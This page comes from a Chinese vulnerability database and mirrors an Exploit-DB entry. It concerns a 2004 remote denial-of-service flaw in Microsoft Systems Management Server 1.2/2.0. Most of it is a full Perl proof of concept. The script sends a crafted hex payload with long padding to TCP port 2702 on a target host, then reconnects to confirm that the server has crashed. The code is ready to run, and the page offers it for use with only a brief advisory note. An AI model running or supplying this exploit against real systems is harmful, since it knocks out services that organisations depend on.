Microsoft Systems Management Server 1.2/2.0 – Remote Denial of Service

Microsoft Systems Management Server 1.2/2.0 – Remote Denial of Service

漏洞ID 1054520 漏洞类型
发布时间 2004-07-14 更新时间 2004-07-14
图片[1]-Microsoft Systems Management Server 1.2/2.0 – Remote Denial of Service-安全小百科CVE编号 N/A
图片[2]-Microsoft Systems Management Server 1.2/2.0 – Remote Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24281
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10726/info

Reportedly Microsoft Systems Management Server is vulnerable to a remote denial of service vulnerability. This issue is due to a failure of the affected server to handle exceptional conditions.

Successful exploitation of this issue will allow an attacker to trigger a denial of service condition in the affected server. Code execution might be possible but is unlikely and unconfirmed. 

#!/usr/bin/perl

#############################
#
# SMS DOS proof of concept and test code
#
#############################

use Socket;
use IO::Socket;

if (@ARGV != 1)
{
        print "usage: $0 <host or ip>n";
        exit;
}

$host = shift(@ARGV);

$hexmsg =
converthex("52434830160040005243484558585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858
58585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858");

print "nCreating socket for connection to: $hostnn";

my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => "(2702)", Proto => "tcp") or die("Could not create socket: $!n");

$sock1->autoflush(1);

print $sock1 "$hexmsg";

while (<$sock1>)
{
        print;
}

print "nPacket sent to $host (please wait) ...n";

sleep(2);

print "Verifying status of $host ...n";

sleep(2);

my $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => '(2702)', Proto => 'tcp') or die("nDOS was successful - $host is down ...n");

print "nAttempt was not successful. $host is still alive and responding ...n";

close($sock1);
close($sock2);
#############################
# End main code, start subs
#############################

sub converthex
{
        local ($l) = @_;
        $l =~ s/([0-9a-f]{1,2})s*/sprintf("%c",hex($1))/egi;

        return $l;
}

#############################
# End code
#############################

相关推荐: Cognos Powerplay Web Edition Dynamic Directory Vulnerability

Cognos Powerplay Web Edition Dynamic Directory Vulnerability 漏洞ID 1104678 漏洞类型 Configuration Error 发布时间 1999-06-28 更新时间 1999-06-28…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享